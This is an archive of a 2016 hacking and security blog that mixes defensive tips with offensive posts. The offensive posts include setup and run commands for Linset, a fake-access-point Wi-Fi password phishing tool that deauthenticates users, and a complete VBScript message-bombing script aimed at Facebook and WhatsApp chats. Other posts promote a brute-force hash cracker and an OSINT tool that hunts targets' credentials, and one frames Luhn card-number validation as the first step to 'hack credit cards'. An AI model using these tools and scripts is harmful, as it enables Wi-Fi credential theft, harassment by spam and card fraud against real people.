5 Best Ways to Secure Mobile Users

As mobile devices have become essential part of human life, soon it will be used as a tool for the employee to enhance their productivity. While workplace flexibility and convenience is increasing, mobile employees are actually putting enormous amounts of company data at risk. Most of the time employees use third party applications, ignores security updates, access unprotected network connections that leave personal and corporate data at risk and become the easiest target for the cyber criminals.

To reduce such risk from employee end, Alvaro Hoyos, the Chief Information Security Officer at OneLogin has suggested some tips that will surely enable organizations to double check the mobile user’s and the employee’s security.



Realistic Security Policies:


The organizations should prefer more reliable and realistic policies, if they implement policies that are rigged as compare to organization’s maturity, chances are that the employees will subvert or ignore them altogether.
Policies should be strict but also workable, so that it influence employee to follow the policy and get their work done. This is important when it comes to mobile users that operates cooperate applications on their Smartphone or tablets. Policies should be implemented for every device that is being used by the employees.

Multifactor authentication:


As many employees access their information and work for the organization from a remote location, it is most important to assure that right person is using the right information. For that Multi-factor authentication should be used that guarantees the access controls.
The hackers are evolving their attacking techniques; the only way to protect unauthorized access is to implement multi-factor authorization for mobile users to reduce the risk of any hacking incident.

Empower Employee:


Organizations deploy many automated detection systems that alerts them with any uncertain or unexpected activity. This process can spread to granular part of the organization that is employees. By empowering employees to become a part of the organization’s detection plan, employees will get to know about the activities they have direct control over, such as changing their password or logging in from a new location, it will help organization to make employee the part of the early detection plan.

Understanding the Risk of Mobility:

Mobile devices, whether those used by employees or by mobile users, should not be the primary or users with complete access or should be carrying organizational confidential information. The organizations should consider the risk of stolen or misplaced devices, that how devastating it could be. To overcome this critical issue, mobile user should protect their devices with a trusted SaaS solution. Additionally, documents on mobile systems should be backed up on a daily basis.
Furthermore, policies should be defined for the mobile end users that what data can be copied to mobile devices and what data should never leave those same systems.


Continuous Monitoring and tracking:


As employees are accessing the systems from mobile devices in a huge number, it is possible that the device may get lost, stolen or misplaced. In such case asset tracking system should be implemented. No doubt these solutions are expensive, but worth investing to protect an organization’s asset from falling into the wrong hands.  Devices that are no longer in use or have been lost or stolen need to be tracked as well, in case they reappear on your network.

Just as making sure about which remote device is doing what from where, threats will be still there. Monitoring is the best option to expose the uncertain activities to prevent the employees to enter privileged mode or access the restricted information. Unauthorized mobile users can be devastating for any organization, so prevention techniques should be implemented to reduce this risk.


~ vendredi 30 septembre 2016 0 commentaires

WPA WPA2 Phishing Tool: Linset

Linset is not a social engineering tool that is used to hack without bruteforce; it requires only two programs that are lighttpd and php5-cgi.

apt-get install lighttpd

apt-get install php5-cgi

After you unzip the download, place the linset folder found in the download into root. This folder contains a php file, a backup php and an alldata.txt. You cannot change the name of the linset folder or place it in another location unless you change the bash coding.



How it works

Scan the networks.
Select network.
Capture handshake (can be used without handshake).
We choose one of several web interfaces tailored for me (thanks to the collaboration of the users).
Mounts one FakeAP imitating the original.
A DHCP server is created on FakeAP.
It creates a DNS server to redirect all requests to the Host.
The web server with the selected interface is launched.
The mechanism is launched to check the validity of the passwords that will be introduced.
It de-authenticate all users of the network, hoping to connect to FakeAP and enter the password.
The attack will stop after the correct password checking.

How to Use

$ git clone https://github.com/chunkingz/linsetmv1-2.git

$ cd linsetmv1-2

$ chmod a+x linsetmv1-2

$ mv linset /

$ ./linsetmv1-2


Download
                                                                    Download Now

~ mardi 27 septembre 2016 0 commentaires

Durvasav: Bruteforce Password Cracker

Durvasav bruteforce password cracker is a simple bruteforce password hash cracker program written in C language. It is a console program released under GNU GPL version 3 and runs on Windows. This tool is used to extract plain text from any standard hashes. It uses the OpenSSL library for generating hashes.



Durvasav allows us to compare thousands of hashes to a hash table at a time. It supports MD4, MD5, SHA0, SHA1, SHA224, SHA256, SHA384 and SHA512 standard hashing algorithms. You can also produce hash tables of all these hashes for different character sets or generate wordlists for reverse hash lookup.



Features:

Supports MD4, MD5, SHA0, SHA1, SHA224, SHA256, SHA384 and SHA512.
Uses fast OpenSSL library.
Includes wide variety of character sets and a custom character set.
Performs ‘pseudo’ operation.
Hash table generation.
Generates bruteforce password table.
Import and compare hash tables containing thousands of hashes.
Maximum password length of 12 characters (will increase it).
Wordlist generation for all characters.
Compatible with Windows 32bit and 64bit.

You can either choose from predefined character sets or a custom character set of your own.

[0…9] – Numeric from 0-9.
[a…z] – Small letters from a-z.
[A…Z] – Capital letters from A-Z.
[0…z] – 0-9 numeric and a-z alphabets.
[0…Z] – 0-9 numeric and A-Z alphabets.
[a…Z] – All small and capital letters.
[0..a..Z] – All numbers, small letters and capital letters.
[All] – All numbers, small letters, capital letters and all special characters.
[Custom] – Select this if you want use a custom character set.



~ 0 commentaires

C Programming For Hackers - Part 4


~ jeudi 22 septembre 2016 0 commentaires

Open Source OSINT Assistant: DataSploit

The various Open Source Intelligence (OSINT) tools used to capture data, gives the user all the relevant information about the domain / email / phone number / person, etc. It allows us to expand our attack/defense surface by collecting relevant information about the target.

DataSploit simply requires the minimum data (such as domain name, email ID, person name, etc. It is developed by using different programming languages that are popular among the field, that are Python, MongoDb and Django. Once the data is collected, firstly the noise is removed, after which data is correlated and after multiple iterations it is stored locally in a database which could be easily visualized on the UI provided. The sources provided are picked after complete analysis and are known to be providing reliable information.



Features:

  • Performs automated OSINT on a domain / email / username / phone and find out relevant information from different sources.
  • Useful for Pen-testers, Cyber Investigators, Product companies, defensive security professionals, etc.
  • Correlates and collaborate the results, show them in a consolidated manner.
  • Tries to find out credentials, api-keys, tokens, sub domains, domain history, legacy portals, etc. related to the target.
  • Available as single consolidating tool as well as standalone scripts.
  • Available in both GUI and Console.
Requirements:

  • MongoDb, Django, Celery and RabbitMq
  • Bunch of python libraries
    • amqp==1.4.9
    • anyjson==0.3.3
    • BeautifulSoup==3.2.1
    • beautifulsoup4==4.4.1
    • billiard==3.3.0.23
    • bs4==0.0.1
    • celery==3.1.23
    • clearbit==0.1.4
    • config==0.3.9
    • Django==1.9.8
    • django-celery==3.1.17
    • dnspython==1.14.0
    • future==0.15.2
    • idna==2.1
    • json2html==1.0.1
    • kombu==3.0.35
    • lxml==3.6.0
    • piplapis-python==5.1.0
    • pyinotify==0.9.6
    • pymongo==3.3.0
    • python-Wappalyzer==0.2.2
    • python-whois==0.6.2
    • pytz==2016.6.1
    • requests==2.10.0
    • requests-file==1.4
    • simplejson==3.8.2
    • six==1.10.0
    • tldextract==2.0.1
    • tqdm==4.7.6
    • termcolor
Download:



~ mardi 20 septembre 2016 0 commentaires

Has your password been leaked?

Don't want to read the theory? Just want to see if your password has been leaked. Click here or scroll down.

How websites store data

When you create an account on a website, the website stores your registration details on it's SQL databases. Very few people, even within the company/website have direct access to the databases.

In a naive world, the database would contain your plaintext passwords. However, since there are hackers doing SQL injection attacks to dump the database data, it's helpful to keep the password hashed/ encrypted. This would mean that even if someone has access to the table, he would see your username, email address, and hashed password, but not the plain-text password.

Those who don't know about hashing may wonder how does the website check if you are typing the correct password during login, if the site itself doesn't know you password. Well, to understand that, you must understand what hashing is. You can read it up on wikipedia for a technical idea, but I'll (grossly over-)simplify it for you.

Hashing is any operation which is easy in one direction, and difficult in reverse. For example, mixing two colors is easy, while finding out the constituent colors of a color mixture isn't quite that easy. Multiplying two large (prime) numbers is easy, but given a huge prime number, it isn't easy to find the two prime factors which multiplied result in that number.
Hashing example

Let's say your password is "pass", and there's a hashing function f(x). Then, 
f("pass") = d@A2qAawqq21109 (say).
Going the forward way is quite simple. On the other hand, figuring out the plain-text password from the hash (d@A2qAawqq21109) is almost impossible.

So, when you create an account and you type the password as "pass", d@A2qAawqq21109 is stored in the database.When you login and type password as "pass", the server hashes it, and it becomes "d@A2qAawqq21109", which is matched with the SQL database. If you typed out some other password, say "ssap", then the hash generated would be different, and you won't be able to log in. Note that while the hashing function gives different outputs for most strings, every once in a while, there may be collisions (two strings may have the same hash). This is very very very rare, and shouldn't be of any concern to us.

Forgot Your Password - Ever wondered why almost all websites give you a new password when you forget your old one, instead of just telling you your password. Well, now you know, it turns out that they themselves don't know your password, and hence can't tell you. When they offer you a chance to change your password, they just change the corresponding hash in their tables, and now your new password works.

How hashes are cracked - I wrote earlier that hash functions are easy to go one way, but almost impossible to go the other. The task of going the other way can be accomplished by bruteforce method. Basically, suppose someone had the password "pass". Now, a hacker who only has access to the hashes can hash all the passwords in alphabetical order and then check which hash matches. (assume hacker knows password has length four and only alphabets). 
He tries 'aaaa','aaab', 'aaac',......'aaba', 'aabb' ,'aabc',.....'aazz' , 'abaa', ................ 'paaa','paab',.. ,'pass'. When he tries 'aaaa', the hash is not d@A2qAawqq21109, it is something else. Till he reaches 'pass', he gets a hash which doesn't match  d@A2qAawqq21109. But for 'pass', the hash matches. So, the hacker now knows your password.

Website leaks


Due to the above reason, website leaks are bad, but not that bad. If the passwords are sufficiently complex, the hashing algorithm is secure, and salt (explained later) is used, then it's quite unlikely that the hackers would be able to get many passwords from the database dump. So, even if Facebook DB is leaked, your passwords are most probably safe. Unfortunately, most probably is not something one can work with, especially when you have so much to loose in case the 0.1% chance of password being compromised is the one that materializes. So, after a DB leak, the website often asks all it's users to change their passwords (eg. dropbox leak, linkedin leak, myspace leak etc.). Also, since you might be using the same password on different websites, it's important that you change your password everywhere.

This isn't even the worst part though. Some websites don't hash your passwords, and store them in plain-text instead. If their database is leaked, the hacker has immediate access to millions of accounts on that website, plus possibly 10s of millions of accounts on other websites which use the same email/username - password combination.For example, 000webhost database had plain-text passwords, and it was leaked. I personally hosted a site there once, and my account was compromised as well. 

But this still isn't the worst part. The hackers often dump the databases publicly. The responsible ones let the website know that their security sucks, and asks them to inform their customers about the leak and get their passwords changed. After sufficient time is given to the website to act, the hacker would often dump the database publicly. To see the extent of this, take 000webhost's example. The first search result for "000webhost leak" gives you the database, which you can download and see the passwords. The password I was using 3-4 years ago is there in the database. That very password is probably still there on some of the websites that I signed up for 3-4 years ago but haven't you them since then (and hence didn't update the password). 

Problem 1 : Suppose there's an hashing scheme X. Under that scheme, "pass" becomes d@A2qAawqq21109. Now this is a very secure scheme and every website uses it. Now, there'a guy who has a lot of computational power and  he computes the hashes of all possible letter combinations under the scheme X. Now, given a hashed value, he can simply lookup/search his table and see what password does it correspond to. He makes this table of word to hash available online. Now, it's quite easy to get the passwords from a database dump. 

Problem 2 : Alternatively, even if the scheme isn't common, what one can do is that he can take a common password, say "password", then hash it, and then search all the users in the 100 million users password dump and see if any hash matches. If it does, then that means that the given user has the password "password". By using 1 million common password, he'll probably get 10% of the users password among the 100 million users.

Solution : Hashing Salt - To prevent that, each user chooses a password, and is given a random string, the hashing salt. The hashing function operates on both the password and the salt. So, if two users have same password, but different salts, then they'll have different hashes. This renders both the above techniques/problems useless. Now, to get the correct hash, the hacker has to input the correct password and the correct salt to the hashing function. This means that -

  1. The first problem where someone else pre-computed the password-hash table is solved, since now that person has to make password-salt-hash table (for every password and every salt combination, what's the hash), which is going to be too many possible combinations. If there are 10 million possible passwords, and 10 million possible salts, there would be 100 million million combinations (I don't even know what million million even is). If there are 10 common salts which are used very often, then the person can make a table with all the 10 million passwords hashed for the 10 common salts. Alternatively, the person can hash the 10 most common password with 10 million possible hashes. Thus, it's important to have both strong passwords and random salts.
  2. The second problem is also kind of solved, since the person would have to solve the hash of common passwords with each salt in the table (note that he doesn't have to do it for all 10 million combinations, only the ones present in the table). Again, not using easy generic password like "password","hello", etc. would solve this issue.

Weak salts? One of the flaws with hashing is that it could have weak salts. WPA/WPA-2 is quite robust, but since it used the SSID of the network as salt, the routers which use default SSID's ("linksys","netgear",etc.) are more vulnerable than others since rainbow tables exist which have hashes for most common passwords and most common SSIDs. That said, I'd like to re-iterate, WPA/WPA-2 is still quite damn secure, and I pointed this out only as a relevant example.

Are you compromised?

Out of all the leaks so far, I had accounts in 4 of the leaks. My account was there in the Myspace leak, the LinkedIn leak, the dropbox leak, and the 000webhost leak. I had to change my password on multiple sites on multiple occasions. 

One way to find out if you're compromised is to look for all the dumps and check manually if you're in them. However, that's practically impossible (not all dumps are public, and looking for your name/email in a huge file takes the computer more time than you'd guess). Fortunately, there's a website which specifically exists for this purpose, known as LeakedSource. You can search using your email free of cost. They offer some extra functionality for pretty affordable rates ($4 paypal, $2 bitcoin). 


I am compromised

If you find out that your account is indeed compromised, then I suggest you quickly change your password on all services that you use which have the same password. Better yet, change all your passwords. It's good practice to keep changing your passwords regularly anyway. Also, if a website has the two step authentication feature, then it's suggested that you use it.

~ dimanche 18 septembre 2016 0 commentaires

C Programming For Hackers - Part 3


~ samedi 17 septembre 2016 0 commentaires

How to stop WhatsApp to share Mobile Number with Facebook

It’s been around more than two years that Facebook has officially acquired Whatsapp to expand the digital marketing landscape. Despite Whatsapp CEO Jan Koum said that user privacy wouldn’t suffer, the services are about to get a little bit friendlier with their data sharing.

Whatsapp has changed its privacy policy; in its new privacy policy it gives permission to share data, including your phone number, with Facebook. In an FAQ, WhatsApp says it is doing this to:

More accurately count unique users.
Better fights spam and abuse.
Show better friend suggestions and more relevant ads to you on Facebook.



In a blog post, Whatsapp stated the reason behind this data sharing that highlights its plan to test the ways to communicate with businesses.

“Whether it’s hearing from your bank about a potential fraudulent transaction, or getting notified by an airline about a delayed flight, many of us get this information elsewhere, including in text messages and phone calls. We want to test these features in the next several months”.

What can be done to avoid this sharing of information between Whatsapp and Facebook?

There are two ways to opt out the sharing your account information with Facebook for targeting purposes.

Method 1:

On WhatsApp, don’t click Agree when it asks you to confirm you are happy with the change of terms. Instead, click read more. You should then see a check box or control button at the bottom of the screen which says “Share my WhatsApp account information with Facebook to improve my Facebook ads and product experiences”, Uncheck this.



Method 2:

If you have already agreed to the updated terms, you can go to to Settings > Account > Share my account info in the app. Then uncheck the box or toggle the control. But quick, WhatsApp says you only have 30 days to make this choice after agreeing to the new terms.



It seems that you can’t completely opt out this, as Whatsapp says that your information is sent to Facebook for other purposes such as improving infrastructure and delivery systems, understanding how its services are being used, securing systems, and fighting spam, abuse, or infringement activities.

So, it’s clear that somehow few of your information are accessible to the Facebook in a secure and reliable way. The only way to avoid this information sharing is to avoid the use of Whatsapp.


~ vendredi 16 septembre 2016 0 commentaires

4 Best Linux Command Line Books

Almost every geek is fascinated to Linux's complex beauty, security and flexibility but if you are a non-linux user or a beginner it is going to be headache to even extract a zip file and install a program using terminal. So if you want to learn Linux then I would strongly recommend you to read Linux Command Line and Shell Scripting Books, eBooks or PDFs to enhance your skills from scratch.

Linux Command Line

Best Books to learn Linux Command Line

Linux is all about commands and codes without it, its nothing but surely it has been introducing nice looking GUIs since its dawn yet most of the task are done through terminal. And its nothing difficult once you begin doing it yourself, all you need is good resources and Linux PDF eBooks are said to be an excellent sources of learning quickly and easily.


The Linux Command Line: A Complete Introduction

One of the best Linux book featuring complete introduction of command lines from basic file navigation to advance topics such as writing programs in Bash. It feeds you very practical examples and explains everything with in-depth tutorial. The initial part serves as an introduction and teaches fundamental lessons like manipulating files and directories, package installation, keyboard tricks etc and then it takes you to advance level of networking, package management, redirection, editing with Vi and compiling programs. You will also learn to automate boring tasks using Shell Scripting. It is very beginner friendly with easy digestible chapters and lots of illustrations as well.


Learn Linux FAST: Including All Essential Command Lines (Linux for Beginners)

If you are an absolute beginner and want to learn from very basic then this book is for you. It's a very helpful short read for newbies because its primary concern is mastering your base by teaching you important Command Lines and Tools. It teaches with step-by-step tutorials and unfolds some amazing tips and tricks, However it also contains loads of guides on Installation and getting started along with brief introduction of Linux distro, And after that it gives some serious practical lessons on Installing Softwares, Redirection and File Editing commands and wildcards too.


Linux Pocket Guide: Essential Commands

This is the best book for Linux commands because it contains hundreds of commands with clear explanation and tutorials on topics such as Programming with Shell Scripts, Media, Text manipulation and pipelines, User management, controlling process and all other important commands which makes you a power user. Whether you are a novice, expert or a daily user you should always have it in your pocket for a quick reference guide. I personally suggest this book to everyone as it is capable of making you Linux ninja.


Linux Command Line and Shell Scripting Bible

Do you want to become expert at Command Line and Shell Scripting? then is what you need. This is a all in one Linux book covering wide range of lessons on Shell Scripting and Command Line fundamentals. It will actually teach you how to directly communicate with your computer using codes giving you more capability and time. The major part of the book is filled with immense guide on Creating Practical Scripts, Understanding and Creating Shell. You will learn to write simple script utilities to automate task, Dash and Bash Shell and Work with like nano, KDE and GNOME editors. It also features one of the largest list of Linux commands cheat sheet.


~ vendredi 9 septembre 2016 0 commentaires

C programming for Hackers - Part 2


~ jeudi 8 septembre 2016 0 commentaires

C Programming for Hackers - Part 1

Facebook Bomb using VB-script





Script :



' InputBoxes

Message = InputBox("What Is The Message?","WhatsApp DDos")

MsgBox "VBScript Written By Priyank Gada"

T = InputBox("How Many Times Needs It To Be Send?","WhatsApp DDos")

If MsgBox("You've Filled It In Correctely", 1024 + vbSystemModal, "WhatsApp DDos") = vbOk Then



' Go To WhatsApp

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("https://www.facebook.com/messages", 1)



' Loading Time



If MsgBox("Search for the name and click on message section?" & vbNewLine & vbNewLine & "Press No To Cancel", vbYesNo + vbQuestion + vbSystemModal, "WhatsApp DDos") = vbYes Then



' The Loop For The Messages

For i = 0 to T

WScript.Sleep 5

WshShell.SendKeys Message

WScript.Sleep 5

WshShell.SendKeys "{ENTER}"

Next



' End Of The Script

WScript.Sleep 3000

MsgBox "Please Visit www.youtube.com/c/priyankgada"

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("http://www.youtube.com/priyankgada", 1)





' Canceled Script

Else

MsgBox "Process Has Been Canceled", vbSystemModal, "DDos Canceled"

End If

Else

End If



~ mercredi 7 septembre 2016 0 commentaires

Whatsapp Bomb using VB-Script

Today , we are going to learn how to bomb messages on web whatsapp using VB-Script.




Explanation of the script.

' InputBoxes
This section is the data input. Here we are taking inputs from the user . Contact stores the name of the contact. Message stores the message , T stores the times.


' Go To WhatsApp
This section redirects the user to web whatsapp.

' Loading Time
This section will wait for you to load whatsapp web.

' Go To The WhatsApp Search Bar
This section will press tab key and pass the pointer from URL address bar to Whatsapp message bar.

' Go To The Contacts Chat
This section will type the contact name in the search bar.

' The Loop For The Messages
This section will type message and press enter till the amount of times we need to spam the message. ( T ).

' End Of The Script
This the popup that the script is completed

' Canceled Script
This section will popup the cancellation of the script.


~ 0 commentaires

Create Your First Hidden Website with TOR

Want to explore the world of DarkNet and create your own Hidden Website with TOR? Ideal course is here “Create Hidden Website Using TOR for Beginners”. Now creating a hidden website on DarkNet is not difficult. Start as a beginner and explore the endless possibilities of using TOR web server from different perspective.


In this course you will learn:

How to configure a hidden web server using TOR hidden services.
How to tune Nginx for maximum anonymity.
How to serve HTML content to visitors with (almost) no web server installed to enable maximum anonymous service.
Important security tips anyone running hidden services server should know.

Who should take this course?

This course is for anyone who wishes to set up their first own hidden TOR web server.
Anyone who is interested in exploring the DarkNet.

Just Enroll Now and in several hours you will be able to start your own DarkNet website! In only $20 start creating your own TOR websites.


~ 0 commentaires

Whatsapp 4G VIP SCAM - Technical Analysis


This is a short blog post describing about a recent hoax pertaining the WhatsApp 4.0 version. I would like to clearly highlight that there is no such application as 'Whatsapp 4G'. The version promises users  unrealistic features video calling, new whatsapp themes, delete sent messages from both sides etc

The following is how the message is being propagated:


Technical Analysis 

Upon visiting the link you would be taken to a page where you would be asked to invite 15 friends before you can download the version, upon clicking the invite button, it would use WhatsApp scheme (whatspp://) in order send messages to your friends, and hence you would be promoting a hoax on behalf of the scammers:

The entire business logic is based upon the following client side script - http://new-4g-whatsapp.ga/invite.js.

Upon examining invite.js it was discovered that the code sets a cookie and checks if 15 invites have been sent on the client side: 



Once, the counter has reached up to 15 invites or above, you would be redirected to the download link:

From the above source code, if the value of c is greater or equal to '15', window.location.href would be set to "ur" variable which hosts the following download link - http://ta3.co/new-4G-whatsapp/install.php

The installation link seems to be dead, normally in such scams you would be asked to fill in surveys or installing *free apps* which would not be free as they might be shipped with Malware/adwares.


Update (Whatsapp Gold)


A new variation of Whatsapp 4G VIP scam has recently came into notice with name of "Whatsapp Gold", which basically works on the same principle as above. The only thing that has changed the interface design and name.

~ mardi 6 septembre 2016 0 commentaires

Credit Card 101 - Part 1

Hello guys , we are back with another awesome article. In this series of articles ( credit card 101 ) we are going to learn about various credit cards , how credit cards work , how to hack credit cards and most important how to secure your personal credit card. So to start with credit card hacking we must first understand how credit cards are designed and how they work.


Credit Card Numbers :

So lets consider a random credit card for example ( This is not my credit card ).

4485 3151 5882 2849
Now the credit card number is divided into various parts which help the payment gateway to charge the original consumer of the credit card. 
1. The first number (4) is the MII
2. The next 5-6 numbers are the issuer ID
3. The next numbers leaving the last number are the user ID
4. The last number is the check number also known as check algorithm number.



What is MII ?

MII basically stands for major industry identifier . This is a constant number that is given to the consumer according to the needs of the consumer . For example in most cases a consumer uses his/ her credit card numbers for online transactions. This is the reasons most credit card numbers start from 4 and 5 which means banking and financial industry . This digit can range from 0 to 9. We will provide more information in the bottom of the article .


What is Issuer ID ?

The issuer ID basically stands for the card provider i.e. visa , mastercard , etc. For example if the digit is 4xxxx then it is a VISA card and the length of the card is 16. We have provided more information about in the bottom of the article.

What is User ID ?

This number is basically the Identity of the user and the bank to which the card was issued . It depends on the users account number and other details . This number can be reused if a particular card holder stops using the service.


What is check number ?

A check number is used to ensure the validity of the card. It is the last digit of the credit card. Credit cards follow luhn check algorithm.

Luhn's Credit Card Algorithm :


Original Number : 4485 3151 5882 2849

1. From the back , double every alternate number.
What we get : 8  (16)  6  (10)  (10)  (16)  4  8

2. If the doubled numbers are double-digit numbers then add them.
What we get  : 8   7   6   1   1   7   4   8

3. Write the alternate numbers that we deleted in the first step.
8475   6111   1872   4889

4. Add the new credit card number that we get.
8+4+7+5+6+1+1+1+1+8+7+2+4+8+8+9=80

5. If sum is a multiple of 10 then the credit card number is valid.
Since 80 is the multiple of 10 . We can conclude that 4485 3151 5882 2849 can be a valid credit card number.

MII / Digit Value Category
0 = other industry assignments 
1
= Airlines industry assignments.
2
= Airlines and other industry assignments
3 = Travel and entertainment 
4
= Banking and financial 
5
= Banking and financial 
6
= Merchandising and Banking 
7
= Petroleum 
8
= Telecommunications and other industry assignments 
9
= National assignment
Issuer ID                                  Card Number
  • Diner's Club/Carte Blanche   300xxx-305xxx, 36xxxx, 38xxxx
  • American Express                   34xxxx, 37xxxx                   
  • VISA                                        4xxxxx                               
  • Mastercard                              51xxxx-55xxxx
  • Discover                                  6011xx     





Check Next Article ( will be updated soon )





~ dimanche 4 septembre 2016 0 commentaires

A Critical Vulnerability in Inteno Routers

Security researchers are warning users regarding new critical vulnerabilities in Inteno routers, which could allow remote attackers to replace the firmware on a device to take complete control over it and monitor the internet traffic.

According to F-Secure, the issue affects the Inteno EG500, FG101, DG201 routers. However, more models could be affected, but it couldn’t be sure due to the vendor’s unwillingness to cooperate.

F-Measure claimed the issue in January but, when the vendor replied two months later it argued that software issues are dealt with the operators that sell the equipment to the end users.



The vulnerability itself is associated with the fact that several router models don’t validate the Auto Configuration Server (ACS) certificates. This means that it will allow an attacker to launch Man in the Middle (MITM) attack between ACS and the device and gain full administrative access to the router, allowing them to refresh the firmware.

The implications of such a flaw are potentially serious, according to F-Secure cyber security expert, Janne Kauhanen. He warned:

“By changing the firmware, the attacker can change any and all rules of the router. Watching video content you’re storing on another computer? So is the attacker. Updating another device through the router? Hopefully it’s not vulnerable like this, or they’ll own that too”.

Although, HTTPS traffic is encrypted and won’t be beneficial if hacked by the attacker, but they can still redirect all your traffic to malicious sites that enable them to drop malware on your machine.

However, if HTTPS is not implemented and the attacker is able to launch Man in the Middle attack, then there is no way left to prevent a successful exploitation. Janne Kauhanen told Infosecurity:

“Gaining a MitM position is not trivial, but it’s not outside the realm of possibilities either, whether physically attacking a whole building by breaking into the distribution trunk in the building or using software tricks to route network traffic through a malicious site”.

F-Secure recommended users to keep browsers and other software updated to prevent hackers exploiting any flaws. The use of effective and well known antivirus software is suggested to prevent any malware downloads and to use a VPN to encrypt internet traffic and prevent hackers gaining that initial foothold into the network.


~ vendredi 2 septembre 2016 0 commentaires

Breaking The Great Wall of Web - XSS WAF Evasion CheatSheet


I think it's mandatory to give back to Security community from where we learn cutting edge techniques and information. Therefore after months of effort i am presenting to you a new WhitePaper titled "Breaking Great Wall of Web" without any strings attached.


Acknowledgements

I would like to thank the Acunetix Team for helping with proof-reading of the document.

Background



The WhitePaper not only contains sophisticated XSS vectors but it aims at also explaining the methodology behind bypassing a WAF.  The previous paper on this subject "Bypassing Modern WAF's XSS Filters - Cheat Sheet" was released 3 years back. A lot has changed and evolved during these years, especially with the advent of ECMA Script a new horizon for evasion/obfuscation have been opened. I have already discussed/demonstrated several techniques presented in this whitepaper in my recent Webcast hosted by Garage4hackers team namely "Bypassing Modern WAF's Exemplified At XSS".

Abstract 



 Input Validation flaws such as XSS are the most prevailing security threats affecting modern Web Applications. In order to mitigate these attacks Web Application Firewalls (WAF's) are used, which inspect HTTP requests for malicious transactions. Nevertheless, they can be easily bypassed due to the complexity of JavaScript in Modern browsers. In this paper we will discusses several techniques that can be used to circumvent WAF’s exemplified at XSS.

This will paper talk about the concepts of WAF’s in general, identifying and fingerprinting WAF’s and various methodologies for constructing a bypass. The paper discusses well known techniques such as Brute Forcing, Regular expression reversing and browser bugs for bypassing WAF’s.


~ jeudi 1 septembre 2016 0 commentaires

Want to become Security Engineer?

The risk of financial and reputation damage caused by a data breach has led to greater demand for security engineers, and a growing skills gap. However, with a growing skills gap comes greater opportunity for a fulfilling and lucrative career as a security engineer.



So the question is what security engineer is and what skills are required to be one?

A typical responsibility for a security engineer includes installing and maintaining hardware and software (firewalls, antivirus, and intrusion detection) to reduce security risks within an organization.

The security engineer role is about building and maintaining IT security solutions that help organizations to stay protected against cyber threats. This differs from a security analyst, who is concerned with organizational awareness, policy and governance risk management.

Skills and Qualification:

To become a security engineer, in term of qualification, an employee should have a bachelor’s degree in a technical subject. Such as: computer science, cyber security, mathematics, engineering or science.

While experience in network security is beneficial, and certification with industry standard technologies like Juniper, Blue Coat, Checkpoint, Palo Alto Networks, Cisco IOS or Sophos Enterprise Portal would be a bonus. There is also a range of internationally recognized certifications from organizations such as: CEH, CISSP and (ISC).

Tips:

A tip to become security engineer is to start learning new skills straight away. Watch YouTube videos, subscribe to security blogs and keep up-to-date on recent hacks in the news.

Remember, you don't need a Masters in Cyber Security or ten years experience to become security engineer. An enthusiastic attitude and understanding of the main industry challenges can take you a long way.

Moreover, you can also learn different practical based security courses to gain some practical knowledge, a security engineer requires both practical and theoretical backgrounds of security measure that are used to secure organization and it’s information system.


~ dimanche 28 août 2016 0 commentaires

How to win against Phishing attacks?

A Phishing email will typically direct the user to visit a website where they are asked to update personal information, such as a password, credit card, social security, or bank account numbers, that the legitimate organization already has.

Phishing attacks are originated by an attacker from a remote location using some authentic or similar to authentic sources. That tends user to click on their links and disclose their personal information.



The attackers can run a Phishing campaign that takes only five minutes to put together, and within 25 minutes they get the access to corporate data that can lead to an organization-wide breach.

There are some ways to win against these types of attacks.

Check source of Incoming email:

Your bank or other financial institution will never ask you to give your financial detail, passwords or other personal information by email. Never respond to these emails, and in case of any doubt, call your bank for clarification.

Never follow your bank website link from emails:

You should manually logon to your bank’s website, instead of following the provided links through email. It may take you to a dummy page that attacker have created to steal your login information.

Enhance security of your computer:

Being observing is the key to identify the suspicious activities to protect your computer, but you should install a good antivirus solution to block these types of attacks. In addition, also keep your system and antivirus updated to detect latest attacks and malware.

Serve your sensitive data over private and protected websites only:

There are many websites that are not secured, that are acquiring personal details without any security. Avoid such websites and make sure that you are connected to private and secured network and computer before sending your personal and classified information.

Have any doubt? Don’t risk it:

Just in case you have a doubt that the website is acting abnormally or redirecting you towards unnecessary pages, stop there and don’t risk your information. This is the most basic technique to avoid Phishing attacks.

These are some of the basic techniques to overcome and win against the Phishing attacks, but the organizations should also need to create network strategies to restrict users to access only trusted websites. Additionally, emails should be monitored continuously to block malicious links.


~ vendredi 26 août 2016 0 commentaires